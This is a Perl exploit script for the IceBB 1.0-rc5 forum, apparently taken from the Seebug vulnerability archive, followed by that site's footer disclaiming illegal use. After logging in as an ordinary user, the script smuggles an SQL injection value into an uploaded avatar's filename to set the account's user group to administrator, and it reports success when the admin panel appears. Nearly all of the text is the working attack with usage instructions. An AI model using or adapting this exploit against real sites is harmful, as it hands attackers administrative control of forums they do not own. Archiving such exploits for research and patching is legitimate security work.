#!/usr/bin/perl # IceBB 1.0-rc5 Remote Create Admin Exploit # 1. register a user # 2. run this exploit with this usage : $perl xpl.pl [host&path] [uname] [pass] # 3. login with admin access :) # - magic_quotes_gpc = Off # #### Coded & Discovered By Hessam-x / Hessamx-at-Hessamx.net use LWP::UserAgent; use HTTP::Cookies; $port = \"80\"; $host = $ARGV[0]; $uname = $ARGV[1]; $passwd = $ARGV[2]; $url = \"http://\".$host; print q( ########################################################### # IceBB 1.0-rc5 Remote Create Admin Exploit # # www.Hessamx.Net # ################# (C)oded By Hessam-x ##################### ); if (@ARGV < 3) { print \" # usage : xpl.pl [host&path] [uname] [pass] \"; print \" # e.g : xpl.pl www.milw0rm.com/icebb/ str0ke 123456 \"; exit(); } print \" [~] User/Password : $uname/$passwd \"; print \" [~] Host : $host \"; $xpl = LWP::UserAgent->new() or die; $cookie_jar = HTTP::Cookies->new(); $xpl->cookie_jar( $cookie_jar ); $login = $xpl->post($url.\'index.php\', Content => [ \'act\' => \'login\', \'from\' => \'index.php\', \'user\' => $uname, \'pass\' => $passwd, \'func\' => \'Login\', ],); if($cookie_jar->as_string =~ /icebb_sessid=(.*?);/) { $cookie = $1; print \" [~] Logined ... \"; } else { print \" [-] Can not Login In $host ! \"; exit(); } $badcode = \"\', user_group=\'1\"; $avat = $xpl->post($url.\'index.php\',Content_Type => \'form-data\', Content => [ \'avtype\' => \'upload\', \'act\' => \'ucp\', \'func\' => \'avatar\', \'file\' => [ undef, \'avatar.jpg\'.$badcode, Content_type => \'text/plain\', Content => \'MYAVATAR\', ], \'submit\' => \'Save\', ], ); $test = $xpl->get($url.\'index.php\'); if($test->as_string =~ /Admin Control Center/) { print \" [+] You Are admin Now ! \"; } else { print \" [-] Exploit Failed ! \"; } print \" #################################################### \";
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京ICP备10040895号
暂无评论